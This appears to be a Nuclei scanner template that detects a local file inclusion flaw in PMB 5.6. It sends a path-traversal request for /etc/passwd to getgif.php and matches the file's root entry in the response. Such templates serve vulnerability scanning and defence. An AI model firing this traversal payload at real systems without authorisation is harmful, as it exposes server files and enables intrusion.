35 lines
921 B
YAML
35 lines
921 B
YAML
id: pmb-local-file-disclosure
|
|
|
|
info:
|
|
name: PMB 5.6 - Local File Inclusion
|
|
author: dhiyaneshDk
|
|
severity: high
|
|
description: PMB 5.6 is vulnerable to local file inclusion.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/49054
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 1
|
|
tags: lfi,pmb,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif={{rand_base(4)}}'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022061fe55d79486bc3a0653559982339847ec61084a2730c385738e2b069f94a584022100a2c51e5e9c4f9f3fcf5bf2baee82f13c80b64160b7575a8dde86e21709776f60:922c64590222798bb761d5b6d8e72950
|